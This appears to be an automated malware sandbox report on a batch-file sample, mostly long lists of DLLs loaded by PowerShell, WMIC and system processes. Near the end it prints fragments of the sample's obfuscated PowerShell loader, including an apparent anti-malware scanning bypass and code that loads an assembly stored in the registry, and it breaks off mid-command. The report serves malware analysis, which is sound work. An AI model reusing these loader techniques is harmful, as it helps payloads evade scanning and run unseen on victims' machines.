Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Q5N7WOpk8J.batStatic file information: File size 5235007 > 1048576
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Obje
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+